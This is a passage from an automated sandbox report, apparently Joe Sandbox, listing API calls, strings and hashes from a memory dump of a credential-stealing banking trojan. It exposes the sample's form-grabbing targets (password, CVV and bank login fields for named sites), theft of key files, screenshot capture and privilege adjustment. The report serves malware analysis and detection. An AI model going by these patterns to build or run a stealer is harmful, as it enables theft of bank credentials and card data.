                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000208), ref: 01300B2A
                                                                                                                                                                                                              • lstrcpynA.KERNEL32(?,pubkeys.key,00000104,?,secret.key,00000002,?,?,?), ref: 01300B44
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,pubkeys.key,00000002,?,?,?), ref: 01300B69
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 01300BA1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 01300BA4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 01300BB0
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 01300BB3
                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},?,?,?), ref: 01300BC0
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 01300BE6
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,?,?,?), ref: 01300C08
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14},00000006,00000010,00000000,00000000,00000000,?), ref: 01300C23
                                                                                                                                                                                                              • LocalFree.KERNEL32(?,?,?,?), ref: 01300C2E
                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?), ref: 01300C39
                                                                                                                                                                                                              • ReleaseMutex.KERNEL32(00000000,?,?,?), ref: 01300C40
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?), ref: 01300C50
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 01300C62
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,pubkeys.key,00000002,?,?,?), ref: 01300C8F
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 01300C92
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?,?,?), ref: 01300C9F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 01300CA2
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,pubkeys.key,00000002,?,?,?), ref: 01300CAB
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000,?,?,?), ref: 01300CAE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?), ref: 01300CBF
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?), ref: 01300CC2
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ErrorFreeLastPathSecuritymemset$CreateDescriptorDirectoryFileSleepValidatelstrcpyn$#680AttributesBackslashFolderHandleMakeMutexSystem$CloseConvertCurrentDeleteInfoInformationLocalNamedReleaseSaclString
                                                                                                                                                                                                              • String ID: 61c5c11d$Local\{AAF799BF-8989-4fe1-9A0D-95CD39DC0A14}$P0Mw$S:(ML;;NRNWNX;;;LW)$keys.zip$path.txt$pubkeys.key$secret.key
                                                                                                                                                                                                              • API String ID: 3803599744-2108418422
                                                                                                                                                                                                              • Opcode ID: fa6ec78c6c8cf90b88edaba8a9f6a6680470d00db838c12fdb7cba485ddc696c
                                                                                                                                                                                                              • Instruction ID: b96d9b0dbdbbf2d639e05ee79ead0d7f5819e411c38280d500daf55e2126c3ec
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fa6ec78c6c8cf90b88edaba8a9f6a6680470d00db838c12fdb7cba485ddc696c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6ED1E2701043429FE736AF689868FAB7BECBF89748F04451CF68597285DB74D608CBA1
                                                                                                                                                                                                              Function 012F89D0 Relevance: 91.4, APIs: 37, Strings: 15, Instructions: 400threadCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT(?,00000000,00000103,?), ref: 012F89F2
                                                                                                                                                                                                              • IsBadReadPtr.KERNEL32(?,?,?,?), ref: 012F8A0F
                                                                                                                                                                                                                • Part of subcall function 012F4170: GetProcessHeap.KERNEL32(00000008,00000016,7597EA50,01339B58,01304A9E), ref: 012F4181
                                                                                                                                                                                                                • Part of subcall function 012F4170: HeapAlloc.KERNEL32(00000000), ref: 012F4188
                                                                                                                                                                                                                • Part of subcall function 012F4170: memset.MSVCRT(00000000,00000000,00000016), ref: 012F4198
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,?,?), ref: 012F8A35
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv=,00000000,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE433
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE441
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE44D
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvv2=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE45B
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvc=,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE467
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: StrStrIA.SHLWAPI(00000000,&cvc=&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE479
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: strstr.MSVCRT(00000000,&domain=letitbit.net&,?,00000000,00000001,00000000,?,?,?,012F8A44,?,?,?,?,?), ref: 012FE48F
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: strstr.MSVCRT(00000000,01329A24,?,012F8A44,?,?,?,?,?), ref: 012FE4A2
                                                                                                                                                                                                                • Part of subcall function 012FE3F0: GetProcessHeap.KERNEL32(00000008,-00000011,?,?,?,?,?,?,?,?,?), ref: 012FE50B
                                                                                                                                                                                                                • Part of subcall function 013044A0: strstr.MSVCRT(00000000,login.yota.ru,?,00000000), ref: 013044DC
                                                                                                                                                                                                                • Part of subcall function 013044A0: strstr.MSVCRT(00000000,IDToken1=), ref: 013044EF
                                                                                                                                                                                                                • Part of subcall function 013044A0: strstr.MSVCRT(00000000,IDToken2=), ref: 01304502
                                                                                                                                                                                                                • Part of subcall function 013044A0: PathAddBackslashA.SHLWAPI(0133D2A0), ref: 01304528
                                                                                                                                                                                                                • Part of subcall function 013044A0: PathAddBackslashA.SHLWAPI(0133D2A0), ref: 01304562
                                                                                                                                                                                                                • Part of subcall function 013044A0: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 013045CD
                                                                                                                                                                                                                • Part of subcall function 013044A0: GetLastError.KERNEL32 ref: 013045D7
                                                                                                                                                                                                                • Part of subcall function 01301A60: strstr.MSVCRT(00000000,&txtSubId=,00000000,?), ref: 01301A83
                                                                                                                                                                                                                • Part of subcall function 01301A60: strstr.MSVCRT(00000000,&txtPin=), ref: 01301A92
                                                                                                                                                                                                                • Part of subcall function 01301A60: strstr.MSVCRT(00000000,ebank.laiki.com), ref: 01301AA1
                                                                                                                                                                                                                • Part of subcall function 01301A60: PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301ACD
                                                                                                                                                                                                                • Part of subcall function 01301A60: PathAddBackslashA.SHLWAPI(0133D4A8), ref: 01301B03
                                                                                                                                                                                                                • Part of subcall function 01301A60: CreateDirectoryA.KERNEL32(?,00000000,?), ref: 01301B6C
                                                                                                                                                                                                                • Part of subcall function 01301A60: GetLastError.KERNEL32 ref: 01301B76
                                                                                                                                                                                                                • Part of subcall function 01301A60: #680.SHELL32 ref: 01301B7E
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_username=,00000000,00000000,?,?,?,?,?), ref: 012F8A5C
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,j_password=,?,?,?,?,?), ref: 012F8A6C
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD,?,?,?,?,?), ref: 012F8A9D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61C5C0AD,?,?,?,?,?), ref: 012F8AAB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8AB8
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C0AD,?,?,?,?,?), ref: 012F8ABF
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,command=auth_loginByPassword&back_command=&back_custom1=&,?,?,?,?,?), ref: 012F8B2E
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f,?,?,?,?,?), ref: 012F8B5D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61c5c09f,?,?,?,?,?), ref: 012F8B6B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8B78
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c09f,?,?,?,?,?), ref: 012F8B7F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edClientLogin=,?,?,?,?,?), ref: 012F8BF3
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edUserLogin=,?,?,?,?,?), ref: 012F8C03
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,edPassword=,?,?,?,?,?), ref: 012F8C13
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C079,?,?,?,?,?), ref: 012F8C3D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61C5C079,?,?,?,?,?), ref: 012F8C4B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8C58
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61C5C079,?,?,?,?,?), ref: 012F8C5F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,&LOGIN_AUTHORIZATION_CODE=,?,?,?,?,?), ref: 012F8CCF
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3,?,?,?,?,?), ref: 012F8CFD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61c5c1a3,?,?,?,?,?), ref: 012F8D0B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(00000000,?,?,?,?,?), ref: 012F8D18
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c1a3,?,?,?,?,?), ref: 012F8D1F
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,action=auth&np=&login=,?,?,?,?,?), ref: 012F8D93
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125,?,?,?,?,?), ref: 012F8DBD
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,61c5c125,?,?,?,?,?), ref: 012F8DCB
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(61c5c125,?,?,?,?,?), ref: 012F8DD6
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,CryptoPluginId=AGAVA&Sign,?,?,?,?,?), ref: 012F8E43
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94,?,?,?,?,?), ref: 012F8E6D
                                                                                                                                                                                                              • PathAppendA.SHLWAPI(00000000,0133CF94,?,?,?,?,?), ref: 012F8E7B
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(0133CF94,?,?,?,?,?), ref: 012F8E86
                                                                                                                                                                                                              • CreateThread.KERNEL32(00000000,00000000,01303570,00000000,00000000,00000000,00000000,?,?,?,?,?,?), ref: 012F8EE8
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,?,?,?,?,?,?), ref: 012F8F00
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?), ref: 012F8F11
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Path$Backslash$strstr$Append$CreateHeap$DirectoryErrorHandleLastProcessmemset$#680AllocCloseInformationReadThreadmemcpy
                                                                                                                                                                                                              • String ID: &LOGIN_AUTHORIZATION_CODE=$61C5C079$61C5C0AD$61c5c09f$61c5c125$61c5c1a3$CryptoPluginId=AGAVA&Sign$action=auth&np=&login=$command=auth_loginByPassword&back_command=&back_custom1=&$edClientLogin=$edPassword=$edUserLogin=$j_password=$j_username=$pass.log
                                                                                                                                                                                                              • API String ID: 1290287848-3693261215
                                                                                                                                                                                                              • Opcode ID: 0059788d25e9b6ed6f38bbf07f2fafafd82d1ff33dc21039cfae67fe205d68eb
                                                                                                                                                                                                              • Instruction ID: 985f6bf1e592d8e74d81780a030050b73bf3655effbed1b5fb0b6b65d31de021
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0059788d25e9b6ed6f38bbf07f2fafafd82d1ff33dc21039cfae67fe205d68eb
                                                                                                                                                                                                              • Instruction Fuzzy Hash: B1D10A31A142665BCB31AB289C54BFBBFE8AF55B04F04409DEB84A7345CE709945CBE1
                                                                                                                                                                                                              Function 012F0940 Relevance: 75.6, APIs: 40, Strings: 3, Instructions: 311memorynetworkCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 012F0981
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0984
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110), ref: 012F099E
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000022,00000000,?), ref: 012F09BE
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F09DF
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F09E2
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F09F7
                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 012F0A0D
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 012F0A29
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000015,?,00000000), ref: 012F0A3C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000110), ref: 012F0A4C
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0A4F
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,00000110), ref: 012F0A6A
                                                                                                                                                                                                              • InternetQueryOptionA.WININET(?,00000029,00000000,00000104), ref: 012F0A7D
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F0AC9
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F0ACC
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F0AE0
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F0AF0
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?,00000000,00000000,?), ref: 012F0AFE
                                                                                                                                                                                                              • _snprintf.MSVCRT(?,?,[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s,?,?,?,?,00000000), ref: 012F0B40
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F0B6C
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0B6F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F0B7C
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0B7F
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0B8B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0B8E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0B9B
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0B9E
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0BB4
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0BB7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0BC4
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0BC7
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?,?), ref: 012F0BE6
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0BEF
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0BF8
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0BFB
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0C07
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F0C0A
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 012F0C13
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F0C16
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$FreeValidatememset$AllocInternetOptionQuery$FileModuleName_snprintfmemcpy
                                                                                                                                                                                                              • String ID: UserAgent$[[[URL: %s%sProcess: %sUser-agent: %s]]]{{{%s$}}}
                                                                                                                                                                                                              • API String ID: 1808236364-2343086565
                                                                                                                                                                                                              • Opcode ID: 0e9c438d9f1202fa3c94f24d6f1f1c4056c199b1e6fad88c8a8267abfc141963
                                                                                                                                                                                                              • Instruction ID: 6c96befba68f28e51f843cef26dc674de01e8beda17081a33452c58b34463e5a
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0e9c438d9f1202fa3c94f24d6f1f1c4056c199b1e6fad88c8a8267abfc141963
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94A1B57190021AAFEB21EF68DC49FEFBB79EF54714F148158FB04A7281DA709A01C7A4
                                                                                                                                                                                                              Function 012F2A90 Relevance: 70.4, APIs: 35, Strings: 5, Instructions: 355memoryfileCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • EnterCriticalSection.KERNEL32 ref: 012F2AAC
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012F2AC5
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2ACC
                                                                                                                                                                                                              • PathFileExistsA.SHLWAPI(?), ref: 012F2B0B
                                                                                                                                                                                                              • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 012F2B25
                                                                                                                                                                                                              • PathAddBackslashA.SHLWAPI(?), ref: 012F2B2F
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,40000000,00000003,00000000,00000003,00000080,00000000), ref: 012F2BA8
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012F2BCE
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F2BED
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,?,0132FB50,00000000), ref: 012F2C0F
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 012F2C2A
                                                                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 012F2C35
                                                                                                                                                                                                              • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000002), ref: 012F2C52
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,?), ref: 012F2C84
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 012F2C8B
                                                                                                                                                                                                              • memset.MSVCRT(00000000,00000000,?), ref: 012F2C9F
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 012F2D40
                                                                                                                                                                                                              • LockFile.KERNEL32(?,00000000,00000000,00000001,00000000), ref: 012F2D51
                                                                                                                                                                                                              • WriteFile.KERNEL32(?,00000000,00000001,?,00000000), ref: 012F2D61
                                                                                                                                                                                                              • UnlockFile.KERNEL32(?,?,00000000,00000001,00000000), ref: 012F2D72
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F2D7B
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F2D82
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 012F2D8F
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F2D96
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0132FB50), ref: 012F2DB1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 012F2DB4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,0132FB50), ref: 012F2DC1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 012F2DC4
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 012F2DE1
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 012F2DF3
                                                                                                                                                                                                              • LeaveCriticalSection.KERNEL32(0132FB50), ref: 012F2DFE
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F2E39
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012F2E48
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 012F2E5B
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 012F2E68
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000016.00000002.2103653726.00000000012E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 012E0000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133A000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000016.00000002.2103653726.000000000133E000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_12e0000_swvGCAxOMikYQeoQzimiprVu.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: File$Heap$PathProcess$Security$DescriptorFreePointer$BackslashCreateCriticalFolderHandleLockSectionUnlockValidateWrite$AllocCloseConvertEnterExistsInfoInformationLeaveLocalNamedSaclStringmemset
                                                                                                                                                                                                              • String ID: 9E2B3E4Da$9e2b3e8fa$S:(ML;;NRNWNX;;;LW)$[/pst]$[pst]
                                                                                                                                                                                                              • API String ID: 255608459-2845588016
                                                                                                                                                                                                              • Opcode ID: 0d8e45bad36854f2b526f0c1d5d71f58edc32e03b0873d3e095d0441b8ee5346
                                                                                                                                                                                                              • Instruction ID: 2c075c0cfbd1f6b01fc38ccf12ee475489eeea0e252cba1b4d59767189574318
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0d8e45bad36854f2b526f0c1d5d71f58edc32e03b0873d3e095d0441b8ee5346
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3BC1B431214306ABE7319F689C59FEBBBACEB86714F04851CFB859B1C4DB70D90487A5
                                                                                                                                                                                                              Function 012F2040 Relevance: 65.0, APIs: 34, Strings: 3, Instructions: 284filewindowmemoryCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 012F2053
                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 012F2064
                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 012F2079
                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(00000000), ref: 012F208E
                                                                                                                                                                                                              • SelectObject.GDI32(?,00000000), ref: 012F20A8
                                                                                                                                                                                                              • BitBlt.GDI32(?,00000000,00000000,?,?,00660046,?,?,00660046), ref: 012F20D6
                                                                                                                                                                                                              • GetObjectA.GDI32(00000000,00000018,?,?,?,00660046,?,?,00660046), ref: 012F20EC
                                                                                                                                                                                                              • GlobalAlloc.KERNEL32 ref: 012F215C
                                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 012F216F
                                                                                                                                                                                                              • GetDIBits.GDI32(00660046,00000000,00000000,?,00000000,?,00000000), ref: 012F218C
                                                                                                                                                                                                              • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000002,00000080,00000000), ref: 012F21A6
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentThread.KERNEL32(00000020,00000000,012E358E,75C8DB30,?,?,?,?,012E358E,?,?,012E3751), ref: 01305940
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 01305947
                                                                                                                                                                                                                • Part of subcall function 01305930: GetCurrentProcess.KERNEL32(00000020,012E358E,?,?,?,?,012E358E,?,?,012E3751), ref: 01305957
                                                                                                                                                                                                                • Part of subcall function 01305930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,012E358E,?,?,012E3751), ref: 0130595E
                                                                                                                                                                                                                • Part of subcall function 01305930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 01305981
                                                                                                                                                                                                                • Part of subcall function 01305930: AdjustTokenPrivileges.ADVAPI32(012E358E,00000000,00000001,00000000,00000000,00000000), ref: 0130599B
                                                                                                                                                                                                                • Part of subcall function 01305930: GetLastError.KERNEL32 ref: 013059A5
                                                                                                                                                                                                                • Part of subcall function 01305930: CloseHandle.KERNEL32(012E358E), ref: 013059B6
                                                                                                                                                                                                              • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 012F21CD
                                                                                                                                                                                                              • GetSecurityDescriptorSacl.ADVAPI32(?,00000042,00660046,?), ref: 012F21EF
                                                                                                                                                                                                              • SetNamedSecurityInfoA.ADVAPI32(?,00000001,00000010,00000000,00000000,00000000,?), ref: 012F2209
                                                                                                                                                                                                              • LocalFree.KERNEL32(00660046), ref: 012F2214
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F223C
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,0000000E,00000000), ref: 012F224C
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,0000000E,?,00000000), ref: 012F2260
                                                                                                                                                                                                              • UnlockFile.KERNEL32(00000000,?,00000000,0000000E,00000000), ref: 012F2270
                                                                                                                                                                                                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 012F227F
                                                                                                                                                                                                              • LockFile.KERNEL32(00000000,00000000,00000000,00000028,00000000), ref: 012F228F
                                                                                                                                                                                                              • WriteFile.KERNEL32(00000000,?,00000028,?,00000000), ref: 012F22A3
